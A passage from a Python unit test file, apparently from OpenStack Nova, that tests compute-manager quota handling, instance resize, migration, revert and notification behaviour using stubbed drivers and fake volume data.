self.assertRaises(test.TestingException,
self.compute.terminate_instance,
self.context, instance,
bdms=None, reservations=resvs)
def test_quotas_succesful_soft_delete(self):
instance = jsonutils.to_primitive(self._create_fake_instance(
params=dict(task_state=task_states.SOFT_DELETING)))
resvs = self._ensure_quota_reservations_committed(True, True)
self.compute.soft_delete_instance(self.context, instance,
reservations=resvs)
def test_quotas_failed_soft_delete(self):
instance = jsonutils.to_primitive(self._create_fake_instance(
params=dict(task_state=task_states.SOFT_DELETING)))
def fake_soft_delete(*args, **kwargs):
raise test.TestingException()
self.stubs.Set(self.compute.driver, 'soft_delete',
fake_soft_delete)
resvs = self._ensure_quota_reservations_rolledback(True, True)
self.assertRaises(test.TestingException,
self.compute.soft_delete_instance,
self.context, instance,
reservations=resvs)
def test_quotas_destroy_of_soft_deleted_instance(self):
instance = jsonutils.to_primitive(self._create_fake_instance(
params=dict(vm_state=vm_states.SOFT_DELETED)))
# Termination should be successful, but quota reservations
# rolled back because the instance was in SOFT_DELETED state.
resvs = self._ensure_quota_reservations_rolledback()
self.compute.terminate_instance(self.context, instance,
bdms=None, reservations=resvs)
def _stub_out_resize_network_methods(self):
def fake(cls, ctxt, instance, *args, **kwargs):
pass
self.stubs.Set(network_api.API, 'setup_networks_on_host', fake)
self.stubs.Set(network_api.API, 'migrate_instance_start', fake)
self.stubs.Set(network_api.API, 'migrate_instance_finish', fake)
def _test_finish_resize(self, power_on):
# Contrived test to ensure finish_resize doesn't raise anything and
# also tests resize from ACTIVE or STOPPED state which determines
# if the resized instance is powered on or not.
vm_state = None
if power_on:
vm_state = vm_states.ACTIVE
else:
vm_state = vm_states.STOPPED
params = {'vm_state': vm_state}
instance = self._create_fake_instance_obj(params)
image = 'fake-image'
disk_info = 'fake-disk-info'
instance_type = flavors.get_default_flavor()
instance.task_state = task_states.RESIZE_PREP
instance.save()
self.compute.prep_resize(self.context, instance=instance,
instance_type=instance_type,
image={})
instance.task_state = task_states.RESIZE_MIGRATED
instance.save()
# NOTE(mriedem): make sure prep_resize set old_vm_state correctly
sys_meta = instance.system_metadata
self.assertTrue('old_vm_state' in sys_meta)
if power_on:
self.assertEqual(vm_states.ACTIVE, sys_meta['old_vm_state'])
else:
self.assertEqual(vm_states.STOPPED, sys_meta['old_vm_state'])
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
orig_mig_save = migration.save
orig_inst_save = instance.save
network_api = self.compute.network_api
conductor_api = self.compute.conductor_api
self.mox.StubOutWithMock(network_api, 'setup_networks_on_host')
self.mox.StubOutWithMock(conductor_api,
'network_migrate_instance_finish')
self.mox.StubOutWithMock(self.compute, '_get_instance_nw_info')
self.mox.StubOutWithMock(self.compute,
'_notify_about_instance_usage')
self.mox.StubOutWithMock(self.compute.driver, 'finish_migration')
self.mox.StubOutWithMock(self.compute,
'_get_instance_volume_block_device_info')
self.mox.StubOutWithMock(migration, 'save')
self.mox.StubOutWithMock(instance, 'save')
self.mox.StubOutWithMock(self.context, 'elevated')
def _mig_save(context):
self.assertEqual(migration.status, 'finished')
self.assertEqual(vm_state, instance.vm_state)
self.assertEqual(task_states.RESIZE_FINISH, instance.task_state)
orig_mig_save()
def _instance_save1():
self.assertEqual(instance_type['id'],
instance.instance_type_id)
orig_inst_save()
def _instance_save2(expected_task_state=None):
self.assertEqual(task_states.RESIZE_MIGRATED,
expected_task_state)
self.assertEqual(task_states.RESIZE_FINISH, instance.task_state)
orig_inst_save(expected_task_state=expected_task_state)
def _instance_save3(expected_task_state=None):
self.assertEqual(task_states.RESIZE_FINISH,
expected_task_state)
self.assertEqual(vm_states.RESIZED, instance.vm_state)
self.assertEqual(None, instance.task_state)
self.assertIn('launched_at', instance.obj_what_changed())
orig_inst_save(expected_task_state=expected_task_state)
# First save to update flavor
instance.save().WithSideEffects(_instance_save1)
network_api.setup_networks_on_host(self.context, instance,
'fake-mini')
conductor_api.network_migrate_instance_finish(self.context,
mox.IsA(dict),
mox.IsA(dict))
self.compute._get_instance_nw_info(
self.context, instance).AndReturn('fake-nwinfo1')
# 2nd save to update task state
exp_kwargs = dict(expected_task_state=task_states.RESIZE_MIGRATED)
instance.save(**exp_kwargs).WithSideEffects(_instance_save2)
self.compute._notify_about_instance_usage(
self.context, instance, 'finish_resize.start',
network_info='fake-nwinfo1')
self.compute._get_instance_volume_block_device_info(
self.context, instance,
refresh_conn_info=True).AndReturn('fake-bdminfo')
# nova.conf sets the default flavor to m1.small and the test
# sets the default flavor to m1.tiny so they should be different
# which makes this a resize
self.compute.driver.finish_migration(self.context, migration,
instance, disk_info,
'fake-nwinfo1',
image, True,
'fake-bdminfo', power_on)
# Ensure instance status updates is after the migration finish
self.context.elevated().AndReturn(self.context)
migration.save(self.context).WithSideEffects(_mig_save)
exp_kwargs = dict(expected_task_state=task_states.RESIZE_FINISH)
instance.save(**exp_kwargs).WithSideEffects(_instance_save3)
self.compute._notify_about_instance_usage(
self.context, instance, 'finish_resize.end',
network_info='fake-nwinfo1')
# NOTE(comstud): This actually does the mox.ReplayAll()
reservations = self._ensure_quota_reservations_committed()
self.compute.finish_resize(self.context,
migration=migration,
disk_info=disk_info, image=image, instance=instance,
reservations=reservations)
def test_finish_resize_from_active(self):
self._test_finish_resize(power_on=True)
def test_finish_resize_from_stopped(self):
self._test_finish_resize(power_on=False)
def test_finish_resize_with_volumes(self):
"""Contrived test to ensure finish_resize doesn't raise anything."""
# create instance
instance = self._create_fake_instance_obj()
# create volume
volume_id = 'fake'
volume = {'instance_uuid': None,
'device_name': None,
'volume_id': volume_id}
# stub out volume attach
def fake_volume_get(self, context, volume):
return volume
self.stubs.Set(cinder.API, "get", fake_volume_get)
def fake_get_volume_encryption_metadata(self, context, volume_id):
return {}
self.stubs.Set(cinder.API, 'get_volume_encryption_metadata',
fake_get_volume_encryption_metadata)
orig_connection_data = {
'target_discovered': True,
'target_iqn': 'iqn.2010-10.org.openstack:%s.1' % volume_id,
'target_portal': '127.0.0.0.1:3260',
'volume_id': volume_id,
}
connection_info = {
'driver_volume_type': 'iscsi',
'data': orig_connection_data,
}
def fake_init_conn(self, context, volume, session):
return connection_info
self.stubs.Set(cinder.API, "initialize_connection", fake_init_conn)
def fake_attach(self, context, volume_id, instance_uuid, device_name):
volume['instance_uuid'] = instance_uuid
volume['device_name'] = device_name
self.stubs.Set(cinder.API, "attach", fake_attach)
# stub out virt driver attach
def fake_get_volume_connector(*args, **kwargs):
return {}
self.stubs.Set(self.compute.driver, 'get_volume_connector',
fake_get_volume_connector)
def fake_attach_volume(*args, **kwargs):
pass
self.stubs.Set(self.compute.driver, 'attach_volume',
fake_attach_volume)
# attach volume to instance
instance_p = obj_base.obj_to_primitive(instance)
self.compute.attach_volume(self.context, volume['volume_id'],
'/dev/vdc', instance_p)
# assert volume attached correctly
self.assertEquals(volume['device_name'], '/dev/vdc')
disk_info = db.block_device_mapping_get_all_by_instance(
self.context, instance.uuid)
self.assertEquals(len(disk_info), 1)
for bdm in disk_info:
self.assertEquals(bdm['device_name'], volume['device_name'])
self.assertEquals(bdm['connection_info'],
jsonutils.dumps(connection_info))
# begin resize
instance_type = flavors.get_default_flavor()
instance.task_state = task_states.RESIZE_PREP
instance.save()
self.compute.prep_resize(self.context, instance=instance,
instance_type=instance_type,
image={})
# fake out detach for prep_resize (and later terminate)
def fake_terminate_connection(self, context, volume, connector):
connection_info['data'] = None
self.stubs.Set(cinder.API, "terminate_connection",
fake_terminate_connection)
self._stub_out_resize_network_methods()
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
self.compute.resize_instance(self.context, instance=instance,
migration=migration, image={},
instance_type=jsonutils.to_primitive(instance_type))
# assert bdm is unchanged
disk_info = db.block_device_mapping_get_all_by_instance(
self.context, instance.uuid)
self.assertEquals(len(disk_info), 1)
for bdm in disk_info:
self.assertEquals(bdm['device_name'], volume['device_name'])
cached_connection_info = jsonutils.loads(bdm['connection_info'])
self.assertEquals(cached_connection_info['data'],
orig_connection_data)
# but connection was terminated
self.assertEquals(connection_info['data'], None)
# stub out virt driver finish_migration
def fake(*args, **kwargs):
pass
self.stubs.Set(self.compute.driver, 'finish_migration', fake)
instance.task_state = task_states.RESIZE_MIGRATED
instance.save()
reservations = self._ensure_quota_reservations_committed()
# new initialize connection
new_connection_data = dict(orig_connection_data)
new_iqn = 'iqn.2010-10.org.openstack:%s.2' % volume_id,
new_connection_data['target_iqn'] = new_iqn
def fake_init_conn_with_data(self, context, volume, session):
connection_info['data'] = new_connection_data
return connection_info
self.stubs.Set(cinder.API, "initialize_connection",
fake_init_conn_with_data)
self.compute.finish_resize(self.context,
migration=migration,
disk_info={}, image={}, instance=instance,
reservations=reservations)
# assert volume attached correctly
disk_info = db.block_device_mapping_get_all_by_instance(
self.context, instance['uuid'])
self.assertEquals(len(disk_info), 1)
for bdm in disk_info:
self.assertEquals(bdm['connection_info'],
jsonutils.dumps(connection_info))
# stub out detach
def fake_detach(self, context, volume_uuid):
volume['device_path'] = None
volume['instance_uuid'] = None
self.stubs.Set(cinder.API, "detach", fake_detach)
# clean up
self.compute.terminate_instance(self.context, instance=instance)
def test_finish_resize_handles_error(self):
# Make sure we don't leave the instance in RESIZE on error.
def throw_up(*args, **kwargs):
raise test.TestingException()
def fake(*args, **kwargs):
pass
self.stubs.Set(self.compute.driver, 'finish_migration', throw_up)
self._stub_out_resize_network_methods()
reservations = self._ensure_quota_reservations_rolledback()
instance = self._create_fake_instance_obj()
instance_type = flavors.get_default_flavor()
self.compute.prep_resize(self.context, instance=instance,
instance_type=instance_type,
image={}, reservations=reservations)
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
instance.refresh()
instance.task_state = task_states.RESIZE_MIGRATED
instance.save()
self.assertRaises(test.TestingException, self.compute.finish_resize,
self.context,
migration=migration,
disk_info={}, image={}, instance=instance,
reservations=reservations)
# NOTE(comstud): error path doesn't use objects, so our object
# is not updated. Refresh and compare against the DB.
instance.refresh()
self.assertEqual(vm_states.ERROR, instance.vm_state)
def test_rebuild_instance_notification(self):
# Ensure notifications on instance migrate/resize.
old_time = datetime.datetime(2012, 4, 1)
cur_time = datetime.datetime(2012, 12, 21, 12, 21)
timeutils.set_time_override(old_time)
inst_ref = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=inst_ref)
timeutils.set_time_override(cur_time)
fake_notifier.NOTIFICATIONS = []
instance = db.instance_get_by_uuid(self.context, inst_ref['uuid'])
orig_sys_metadata = db.instance_system_metadata_get(self.context,
inst_ref['uuid'])
image_ref = instance["image_ref"]
new_image_ref = image_ref + '-new_image_ref'
db.instance_update(self.context, inst_ref['uuid'],
{'image_ref': new_image_ref})
password = "new_password"
instance = db.instance_get_by_uuid(self.context, inst_ref['uuid'])
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.REBUILDING})
self.compute.rebuild_instance(self.context,
jsonutils.to_primitive(instance),
image_ref, new_image_ref,
injected_files=[],
new_pass=password,
orig_sys_metadata=orig_sys_metadata,
bdms=[])
instance = db.instance_get_by_uuid(self.context, inst_ref['uuid'])
image_ref_url = glance.generate_image_url(image_ref)
new_image_ref_url = glance.generate_image_url(new_image_ref)
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 3)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEquals(msg.event_type,
'compute.instance.exists')
self.assertEquals(msg.payload['image_ref_url'], image_ref_url)
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEquals(msg.event_type,
'compute.instance.rebuild.start')
self.assertEquals(msg.payload['image_ref_url'], new_image_ref_url)
self.assertEquals(msg.payload['image_name'], 'fake_name')
msg = fake_notifier.NOTIFICATIONS[2]
self.assertEquals(msg.event_type,
'compute.instance.rebuild.end')
self.assertEquals(msg.priority, 'INFO')
payload = msg.payload
self.assertEquals(payload['image_name'], 'fake_name')
self.assertEquals(payload['tenant_id'], self.project_id)
self.assertEquals(payload['user_id'], self.user_id)
self.assertEquals(payload['instance_id'], inst_ref['uuid'])
self.assertEquals(payload['instance_type'], 'm1.tiny')
type_id = flavors.get_flavor_by_name('m1.tiny')['id']
self.assertEquals(str(payload['instance_type_id']), str(type_id))
flavor_id = flavors.get_flavor_by_name('m1.tiny')['flavorid']
self.assertEquals(str(payload['instance_flavor_id']), str(flavor_id))
self.assertTrue('display_name' in payload)
self.assertTrue('created_at' in payload)
self.assertTrue('launched_at' in payload)
self.assertEqual(payload['launched_at'], timeutils.strtime(cur_time))
self.assertEquals(payload['image_ref_url'], new_image_ref_url)
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(inst_ref))
def test_finish_resize_instance_notification(self):
# Ensure notifications on instance migrate/resize.
old_time = datetime.datetime(2012, 4, 1)
cur_time = datetime.datetime(2012, 12, 21, 12, 21)
timeutils.set_time_override(old_time)
instance = self._create_fake_instance_obj()
new_type = flavors.get_flavor_by_name('m1.small')
new_type = jsonutils.to_primitive(new_type)
new_type_id = new_type['id']
flavor_id = new_type['flavorid']
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
instance.host = 'foo'
instance.task_state = task_states.RESIZE_PREP
instance.save()
self.compute.prep_resize(self.context, instance=instance,
instance_type=new_type, image={})
self._stub_out_resize_network_methods()
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
self.compute.resize_instance(self.context, instance=instance,
migration=migration, image={}, instance_type=new_type)
timeutils.set_time_override(cur_time)
fake_notifier.NOTIFICATIONS = []
self.compute.finish_resize(self.context,
migration=migration,
disk_info={}, image={}, instance=instance)
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEquals(msg.event_type,
'compute.instance.finish_resize.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEquals(msg.event_type,
'compute.instance.finish_resize.end')
self.assertEquals(msg.priority, 'INFO')
payload = msg.payload
self.assertEquals(payload['tenant_id'], self.project_id)
self.assertEquals(payload['user_id'], self.user_id)
self.assertEquals(payload['instance_id'], instance.uuid)
self.assertEquals(payload['instance_type'], 'm1.small')
self.assertEquals(str(payload['instance_type_id']), str(new_type_id))
self.assertEquals(str(payload['instance_flavor_id']), str(flavor_id))
self.assertTrue('display_name' in payload)
self.assertTrue('created_at' in payload)
self.assertTrue('launched_at' in payload)
self.assertEqual(payload['launched_at'], timeutils.strtime(cur_time))
image_ref_url = glance.generate_image_url(FAKE_IMAGE_REF)
self.assertEquals(payload['image_ref_url'], image_ref_url)
self.compute.terminate_instance(self.context, instance)
def test_resize_instance_notification(self):
# Ensure notifications on instance migrate/resize.
old_time = datetime.datetime(2012, 4, 1)
cur_time = datetime.datetime(2012, 12, 21, 12, 21)
timeutils.set_time_override(old_time)
instance = self._create_fake_instance_obj()
self.compute.run_instance(self.context, instance=instance)
timeutils.set_time_override(cur_time)
fake_notifier.NOTIFICATIONS = []
instance.host = 'foo'
instance.task_state = task_states.RESIZE_PREP
instance.save()
instance_type = flavors.get_default_flavor()
self.compute.prep_resize(self.context, instance=instance,
instance_type=instance_type, image={})
db.migration_get_by_instance_and_status(self.context.elevated(),
instance.uuid,
'pre-migrating')
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 3)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEquals(msg.event_type,
'compute.instance.exists')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEquals(msg.event_type,
'compute.instance.resize.prep.start')
msg = fake_notifier.NOTIFICATIONS[2]
self.assertEquals(msg.event_type,
'compute.instance.resize.prep.end')
self.assertEquals(msg.priority, 'INFO')
payload = msg.payload
self.assertEquals(payload['tenant_id'], self.project_id)
self.assertEquals(payload['user_id'], self.user_id)
self.assertEquals(payload['instance_id'], instance.uuid)
self.assertEquals(payload['instance_type'], 'm1.tiny')
type_id = flavors.get_flavor_by_name('m1.tiny')['id']
self.assertEquals(str(payload['instance_type_id']), str(type_id))
flavor_id = flavors.get_flavor_by_name('m1.tiny')['flavorid']
self.assertEquals(str(payload['instance_flavor_id']), str(flavor_id))
self.assertTrue('display_name' in payload)
self.assertTrue('created_at' in payload)
self.assertTrue('launched_at' in payload)
image_ref_url = glance.generate_image_url(FAKE_IMAGE_REF)
self.assertEquals(payload['image_ref_url'], image_ref_url)
self.compute.terminate_instance(self.context, instance=instance)
def test_prep_resize_instance_migration_error_on_same_host(self):
"""Ensure prep_resize raise a migration error if destination is set on
the same source host and allow_resize_to_same_host is false
"""
self.flags(host="foo", allow_resize_to_same_host=False)
instance = self._create_fake_instance_obj()
reservations = self._ensure_quota_reservations_rolledback()
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
instance.host = self.compute.host
instance.save()
instance_type = flavors.get_default_flavor()
self.assertRaises(exception.MigrationError, self.compute.prep_resize,
self.context, instance=instance,
instance_type=instance_type, image={},
reservations=reservations)
self.compute.terminate_instance(self.context, instance=instance)
def test_prep_resize_instance_migration_error_on_none_host(self):
"""Ensure prep_resize raises a migration error if destination host is
not defined
"""
instance = self._create_fake_instance_obj()
reservations = self._ensure_quota_reservations_rolledback()
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
instance.host = None
instance.save()
instance_type = flavors.get_default_flavor()
self.assertRaises(exception.MigrationError, self.compute.prep_resize,
self.context, instance=instance,
instance_type=instance_type, image={},
reservations=reservations)
self.compute.terminate_instance(self.context, instance=instance)
def test_resize_instance_driver_error(self):
# Ensure instance status set to Error on resize error.
def throw_up(*args, **kwargs):
raise test.TestingException()
self.stubs.Set(self.compute.driver, 'migrate_disk_and_power_off',
throw_up)
instance = self._create_fake_instance_obj()
instance_type = flavors.get_default_flavor()
reservations = self._ensure_quota_reservations_rolledback()
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
instance.host = 'foo'
instance.save()
self.compute.prep_resize(self.context, instance=instance,
instance_type=instance_type, image={},
reservations=reservations)
instance.task_state = task_states.RESIZE_PREP
instance.save()
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
#verify
self.assertRaises(test.TestingException, self.compute.resize_instance,
self.context, instance=instance,
migration=migration, image={},
reservations=reservations,
instance_type=jsonutils.to_primitive(instance_type))
# NOTE(comstud): error path doesn't use objects, so our object
# is not updated. Refresh and compare against the DB.
instance.refresh()
self.assertEqual(instance.vm_state, vm_states.ERROR)
self.compute.terminate_instance(self.context, instance=instance)
def test_resize_instance_driver_rollback(self):
# Ensure instance status set to Running after rollback.
def throw_up(*args, **kwargs):
raise exception.InstanceFaultRollback(test.TestingException())
self.stubs.Set(self.compute.driver, 'migrate_disk_and_power_off',
throw_up)
instance = self._create_fake_instance_obj()
instance_type = flavors.get_default_flavor()
reservations = self._ensure_quota_reservations_rolledback()
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
instance.host = 'foo'
instance.save()
self.compute.prep_resize(self.context, instance=instance,
instance_type=instance_type, image={},
reservations=reservations)
instance.task_state = task_states.RESIZE_PREP
instance.save()
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
self.assertRaises(test.TestingException, self.compute.resize_instance,
self.context, instance=instance,
migration=migration, image={},
reservations=reservations,
instance_type=jsonutils.to_primitive(instance_type))
# NOTE(comstud): error path doesn't use objects, so our object
# is not updated. Refresh and compare against the DB.
instance.refresh()
self.assertEqual(instance.vm_state, vm_states.ACTIVE)
self.assertEqual(instance.task_state, None)
self.compute.terminate_instance(self.context, instance=instance)
def test_resize_instance(self):
# Ensure instance can be migrated/resized.
instance = self._create_fake_instance_obj()
instance_type = flavors.get_default_flavor()
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
instance.host = 'foo'
instance.save()
self.compute.prep_resize(self.context, instance=instance,
instance_type=instance_type, image={})
# verify 'old_vm_state' was set on system_metadata
instance.refresh()
sys_meta = instance.system_metadata
self.assertEqual(vm_states.ACTIVE, sys_meta['old_vm_state'])
self._stub_out_resize_network_methods()
instance.task_state = task_states.RESIZE_PREP
instance.save()
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
self.compute.resize_instance(self.context, instance=instance,
migration=migration, image={},
instance_type=jsonutils.to_primitive(instance_type))
self.assertEqual(migration.dest_compute, instance.host)
self.compute.terminate_instance(self.context, instance=instance)
def _test_confirm_resize(self, power_on):
# Common test case method for confirm_resize
def fake(*args, **kwargs):
pass
def fake_confirm_migration_driver(*args, **kwargs):
# Confirm the instance uses the new type in finish_resize
inst = args[1]
sys_meta = inst['system_metadata']
self.assertEqual(sys_meta['instance_type_flavorid'], '3')
old_vm_state = None
p_state = None
if power_on:
old_vm_state = vm_states.ACTIVE
p_state = power_state.RUNNING
else:
old_vm_state = vm_states.STOPPED
p_state = power_state.SHUTDOWN
params = {'vm_state': old_vm_state, 'power_state': p_state}
instance = self._create_fake_instance_obj(params)
self.flags(allow_resize_to_same_host=True)
self.stubs.Set(self.compute.driver, 'finish_migration', fake)
self.stubs.Set(self.compute.driver, 'confirm_migration',
fake_confirm_migration_driver)
self._stub_out_resize_network_methods()
reservations = self._ensure_quota_reservations_committed()
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
# Confirm the instance size before the resize starts
instance.refresh()
instance_type_ref = db.flavor_get(self.context,
instance.instance_type_id)
self.assertEqual(instance_type_ref['flavorid'], '1')
instance.vm_state = old_vm_state
instance.power_state = p_state
instance.save()
new_instance_type_ref = db.flavor_get_by_flavor_id(
self.context, 3)
new_instance_type_p = jsonutils.to_primitive(new_instance_type_ref)
self.compute.prep_resize(self.context,
instance=instance,
instance_type=new_instance_type_p,
image={}, reservations=reservations)
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
# NOTE(mriedem): ensure prep_resize set old_vm_state in system_metadata
sys_meta = instance.system_metadata
self.assertEqual(old_vm_state, sys_meta['old_vm_state'])
instance.task_state = task_states.RESIZE_PREP
instance.save()
self.compute.resize_instance(self.context, instance=instance,
migration=migration,
image={},
instance_type=new_instance_type_p)
self.compute.finish_resize(self.context,
migration=migration,
disk_info={}, image={}, instance=instance)
# Prove that the instance size is now the new size
instance_type_ref = db.flavor_get(self.context,
instance.instance_type_id)
self.assertEqual(instance_type_ref['flavorid'], '3')
# Finally, confirm the resize and verify the new flavor is applied
instance.task_state = None
instance.save()
self.compute.confirm_resize(self.context, instance=instance,
reservations=reservations,
migration=migration)
instance.refresh()
instance_type_ref = db.flavor_get(self.context,
instance.instance_type_id)
self.assertEqual(instance_type_ref['flavorid'], '3')
self.assertEqual('fake-mini', migration.source_compute)
self.assertEqual(old_vm_state, instance.vm_state)
self.assertEqual(None, instance.task_state)
self.assertEqual(p_state, instance.power_state)
self.compute.terminate_instance(self.context, instance=instance)
def test_confirm_resize_from_active(self):
self._test_confirm_resize(power_on=True)
def test_confirm_resize_from_stopped(self):
self._test_confirm_resize(power_on=False)
def _test_finish_revert_resize(self, power_on,
remove_old_vm_state=False):
"""
Convenience method that does most of the work for the
test_finish_revert_resize tests.
:param power_on -- True if testing resize from ACTIVE state, False if
testing resize from STOPPED state.
:param remove_old_vm_state -- True if testing a case where the
'old_vm_state' system_metadata is not present when the
finish_revert_resize method is called.
"""
def fake(*args, **kwargs):
pass
def fake_finish_revert_migration_driver(*args, **kwargs):
# Confirm the instance uses the old type in finish_revert_resize
inst = args[0]
sys_meta = inst.system_metadata
self.assertEqual(sys_meta['instance_type_flavorid'], '1')
old_vm_state = None
if power_on:
old_vm_state = vm_states.ACTIVE
else:
old_vm_state = vm_states.STOPPED
params = {'vm_state': old_vm_state}
instance = self._create_fake_instance_obj(params)
self.stubs.Set(self.compute.driver, 'finish_migration', fake)
self.stubs.Set(self.compute.driver, 'finish_revert_migration',
fake_finish_revert_migration_driver)
self._stub_out_resize_network_methods()
reservations = self._ensure_quota_reservations_committed()
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
instance.refresh()
instance_type_ref = db.flavor_get(self.context,
instance.instance_type_id)
self.assertEqual(instance_type_ref['flavorid'], '1')
old_vm_state = instance['vm_state']
instance.host = 'foo'
instance.vm_state = old_vm_state
instance.save()
new_instance_type_ref = db.flavor_get_by_flavor_id(
self.context, 3)
new_instance_type_p = jsonutils.to_primitive(new_instance_type_ref)
self.compute.prep_resize(self.context,
instance=instance,
instance_type=new_instance_type_p,
image={}, reservations=reservations)
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
# NOTE(mriedem): ensure prep_resize set old_vm_state in system_metadata
sys_meta = instance.system_metadata
self.assertEqual(old_vm_state, sys_meta['old_vm_state'])
instance.task_state = task_states.RESIZE_PREP
instance.save()
self.compute.resize_instance(self.context, instance=instance,
migration=migration,
image={},
instance_type=new_instance_type_p)
self.compute.finish_resize(self.context,
migration=migration,
disk_info={}, image={}, instance=instance)
# Prove that the instance size is now the new size
instance_type_ref = db.flavor_get(self.context,
instance['instance_type_id'])
self.assertEqual(instance_type_ref['flavorid'], '3')
instance.task_state = task_states.RESIZE_REVERTING
instance.save()
self.compute.revert_resize(self.context,
migration=migration, instance=instance,
reservations=reservations)
instance.refresh()
if remove_old_vm_state:
# need to wipe out the old_vm_state from system_metadata
# before calling finish_revert_resize
sys_meta = instance.system_metadata
sys_meta.pop('old_vm_state')
# Have to reset for save() to work
instance.system_metadata = sys_meta
instance.save()
self.compute.finish_revert_resize(self.context,
migration=migration,
instance=instance, reservations=reservations)
self.assertEqual(instance.task_state, None)
instance_type_ref = db.flavor_get(self.context,
instance['instance_type_id'])
self.assertEqual(instance_type_ref['flavorid'], '1')
self.assertEqual(instance.host, migration.source_compute)
if remove_old_vm_state:
self.assertEqual(vm_states.ACTIVE, instance.vm_state)
else:
self.assertEqual(old_vm_state, instance.vm_state)
def test_finish_revert_resize_from_active(self):
self._test_finish_revert_resize(power_on=True)
def test_finish_revert_resize_from_stopped(self):
self._test_finish_revert_resize(power_on=False)
def test_finish_revert_resize_from_stopped_remove_old_vm_state(self):
# in this case we resize from STOPPED but end up with ACTIVE
# because the old_vm_state value is not present in
# finish_revert_resize
self._test_finish_revert_resize(power_on=False,
remove_old_vm_state=True)
def _test_cleanup_stored_instance_types(self, old, new, revert=False):
instance = self._create_fake_instance_obj()
migration = dict(old_instance_type_id=old,
new_instance_type_id=new)
instance.system_metadata = dict(instance_type_id=old)
sys_meta = dict(instance.system_metadata)
self.mox.StubOutWithMock(flavors, 'extract_flavor')
self.mox.StubOutWithMock(flavors, 'delete_flavor_info')
self.mox.StubOutWithMock(flavors, 'save_flavor_info')
if revert:
flavors.extract_flavor(instance, 'old_').AndReturn(
{'instance_type_id': old})
flavors.save_flavor_info(
sys_meta, {'instance_type_id': old}).AndReturn(sys_meta)
else:
flavors.extract_flavor(instance).AndReturn(
{'instance_type_id': new})
flavors.delete_flavor_info(
sys_meta, 'old_').AndReturn(sys_meta)
flavors.delete_flavor_info(
sys_meta, 'new_').AndReturn(sys_meta)
self.mox.ReplayAll()
res = self.compute._cleanup_stored_instance_types(migration, instance,
revert)
self.assertEqual(res,
(sys_meta,
{'instance_type_id': revert and old or new}))
def test_cleanup_stored_instance_types_for_resize(self):
self._test_cleanup_stored_instance_types('1', '2')
def test_cleanup_stored_instance_types_for_resize_with_update(self):
self._test_cleanup_stored_instance_types('1', '2', True)
def test_cleanup_stored_instance_types_for_migration(self):
self._test_cleanup_stored_instance_types('1', '1')
def test_cleanup_stored_instance_types_for_migration_with_update(self):
self._test_cleanup_stored_instance_types('1', '1', True)
def test_get_by_flavor_id(self):
type = flavors.get_flavor_by_flavor_id(1)
self.assertEqual(type['name'], 'm1.tiny')
def test_resize_same_source_fails(self):
"""Ensure instance fails to migrate when source and destination are
the same host.
"""
reservations = self._ensure_quota_reservations_rolledback()
instance = self._create_fake_instance_obj()
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
instance.refresh()
instance_type = flavors.get_default_flavor()
self.assertRaises(exception.MigrationError, self.compute.prep_resize,
self.context, instance=instance,
instance_type=instance_type, image={},
reservations=reservations)
self.compute.terminate_instance(self.context, instance)
def test_resize_instance_handles_migration_error(self):
# Ensure vm_state is ERROR when error occurs.
def raise_migration_failure(*args):
raise test.TestingException()
self.stubs.Set(self.compute.driver,
'migrate_disk_and_power_off',
raise_migration_failure)
reservations = self._ensure_quota_reservations_rolledback()
instance = self._create_fake_instance_obj()
instance_type = flavors.get_default_flavor()
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
instance.host = 'foo'
instance.save()
self.compute.prep_resize(self.context, instance=instance,
instance_type=instance_type,
image={}, reservations=reservations)
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
instance.task_state = task_states.RESIZE_PREP
instance.save()
self.assertRaises(test.TestingException, self.compute.resize_instance,
self.context, instance=instance,
migration=migration, image={},
reservations=reservations,
instance_type=jsonutils.to_primitive(instance_type))
# NOTE(comstud): error path doesn't use objects, so our object
# is not updated. Refresh and compare against the DB.
instance.refresh()
self.assertEqual(instance.vm_state, vm_states.ERROR)
self.compute.terminate_instance(self.context, instance=instance)
def test_pre_live_migration_instance_has_no_fixed_ip(self):
# Confirm that no exception is raised if there is no fixed ip on
# pre_live_migration
instance = jsonutils.to_primitive(self._create_fake_instance())
